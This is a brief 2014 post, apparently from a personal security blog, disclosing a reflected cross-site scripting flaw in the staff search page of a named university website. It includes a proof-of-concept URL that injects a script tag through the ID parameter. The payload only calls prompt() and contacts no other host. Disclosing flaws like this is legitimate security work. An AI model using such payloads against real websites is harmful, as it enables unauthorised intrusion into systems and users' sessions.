CSE.UNSW.EDU.AU XSS Vulnerability

08 Sep 2014

The staff search page does not sanitise the input of the ID field allowing an XSS attack to be executed.

Code:

http://www.cse.unsw.edu.au/db/staff/staff.php
?ID="><script>prompt(42)</script>

1 2	http://www.cse.unsw.edu.au/db/staff/staff.php ?ID="><script>prompt(42)</script>

Posted Mo BeigiMohammadG in XSS

Mo Beigi